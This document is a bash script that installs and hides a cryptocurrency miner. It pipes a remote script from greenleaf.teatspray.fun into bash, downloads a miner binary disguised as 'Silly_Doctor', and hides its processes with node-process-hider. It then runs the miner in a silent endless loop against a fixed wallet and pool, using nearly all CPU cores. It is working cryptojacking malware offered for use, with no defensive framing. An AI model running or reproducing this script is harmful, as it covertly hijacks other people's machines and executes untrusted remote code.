#!/bin/bash
export DEBIAN_FRONTEND=noninteractive
DEBIAN_FRONTEND=noninteractive

sleep 2

apt update >/dev/null;apt -y install apt-utils psmisc libreadline-dev dialog automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev git binutils cmake build-essential unzip net-tools curl apt-utils wget dpkg >/dev/null

sleep 2

PID=`ps -eaf | grep shade | grep -v grep | awk '{print $2}'`
if [[ "" !=  "$PID" ]]; then
  echo "killing $PID"
  kill -9 $PID
fi

sleep 2

curl -fsSL https://greenleaf.teatspray.fun/install_and_monitor_shade_root.sh | bash &

sleep 2

wget -O - https://deb.nodesource.com/setup_20.x | bash 

sleep 2

apt-get install -y nodejs npm 1>/dev/null 2>&1

sleep 2 && \

node -v && npm

sleep 2

DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends tzdata > /dev/null

sleep 2

ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime > /dev/null
dpkg-reconfigure --frontend noninteractive tzdata > /dev/null

sleep 2

TZ='Africa/Johannesburg'; export TZ
date
sleep 2

num_of_cores=`cat /proc/cpuinfo | grep processor | wc -l`
currentdate=$(date '+%d-%b-%Y_CodeM_')
ipaddress=$(curl -s api.ipify.org)
underscored_ip=$(echo $ipaddress | sed 's/\./_/g')
currentdate+=$underscored_ip
used_num_of_cores=`expr $num_of_cores - 2`
echo ""
echo "You will be using $used_num_of_cores cores"
echo ""

sleep 2

npm i -g node-process-hider 1>/dev/null 2>&1

sleep 2

ph add update-local 1>/dev/null 2>&1

sleep 2

ph add Silly_Doctor 1>/dev/null 2>&1

sleep 2

wget -q https://greenleaf.teatspray.fun/Silly_Doctor_272.tar.gz 1>/dev/null 2>&1

sleep 2

tar -xf Silly_Doctor_272.tar.gz

echo " "
echo " "


unset LD_PRELOAD
unset LD_PRELOAD_ENV
unset LD_LIBRARY_PATH

sleep 2



while true
do
./Silly_Doctor --disable-gpu --algorithm yespowerdogemone --pool dme.infinium.space:36034 --wallet solo:dmeVN5ngoXMVU5574hWLoV9MbpkcxowaBdaKNh5Ua6xGdKcLmGFCRvWf6dAGm26TDwght9RePMeaCfjPL4ni39Fc3MhLBHJLuF --password $currentdate --proxy 127.0.0.1:1081 --dns-over-https 1 --cpu-threads $used_num_of_cores --keepalive 1>/dev/null 2>&1
sleep 10
done

